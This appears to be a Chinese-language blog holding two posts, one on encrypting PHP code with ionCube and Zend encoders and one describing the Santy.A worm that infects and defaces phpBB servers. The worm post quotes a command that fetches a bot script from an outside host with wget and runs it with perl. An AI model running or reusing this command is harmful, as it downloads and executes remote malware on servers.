CLog

在初學 php 時瀏灠到一些網站時發覺，為何 php 可以用來賣的呢？php 是一個只需要 coding ，不需用 compile 便可以執行。相比其他程式需要 compile，比較 security。若果 php 賣了比第一個人然後再翻給別人，那間公司便賣不了錢了。為何還有這麼多的公司寫 php 賣呢？
當初我是有很多個為什麼…
不過是近年對於 php 有更多的了解後，發現原來 php 是可以加密的。當然 php 本身不能夠把自已加密，不過需要一些外來的程式幫手。
首先是 ionCube 的產品 ionCube Standalone PHP Encoder。ionCube Standalone PHP Encoder 是一個完全獨立的加密和解密程式。在不需要伺服器安裝任何的程式的情況下解密已加密的 php 程式，只需要一個 Directory 中加入 Loaders for ionCube Encoded Files 的檔案便可以使用。
另一個便是由 Zend 公司的產品 Zend Encoder。Zend 這一間公司應該有大部份學習 php 的人仕都會認識，因為這便是制作和支援 php 的公司了。Zend Encoder 是用來把 php 程式加密。不過伺服器方面是必須安裝了 [...]

Santy.A 是一種蠕蟲，它會對運行有漏洞的 phpBB 2.x 並且是 2.0.11 之前版本的網頁伺服器進行傳播。它只會感染網頁伺服器，一般家用或工作站的電腦則不受影響。
蠕蟲利用 Google 搜尋引擎建立一個簡單的查詢去找出運行 php 的網頁伺服器。當每次找到目標伺服器，便會嘗試攻擊處理特殊參數上的漏洞，繼而安裝蠕蟲複本到這台伺服器。若攻擊成功，蠕蟲會複製自己到這台伺服器和覆寫以下延伸類別的所有檔案： .asp, .htm, .jsp, .php, .phtm, .shtm。 它會將受影響的網站內容更改為以下信息：
This site is defaced!!! NeverEverNoSanity WebWorm generation X*
(*X 是受感染數目，會隨著新的感染而自動更新。)
以下是從 Google 搜尋出被病毒入侵的網站 （數量真多，大約有 37,000）：
http://www.google.com/search?hl=en&lr=&q=%22this+site+is+defaced%22
Google 已實施攔截管制由 Santy.A 製造的查詢請求，預期會大大減弱蠕蟲的傳播能力，降低繼續感染的風險。
病毒會不停執行：
wget civa.org/pdf/botwget civa.org/pdf/ssh.ash -c echo _START_; cd /tmp;wget civa.org/pdf/bot;perl bot;wget civa.org/pdf/ssh.a;phttpd -DSSL
佔用伺服器資源：
5023 named     25   0  3044 3044  2180 S    32.3  0.1   1:17   0 named [...]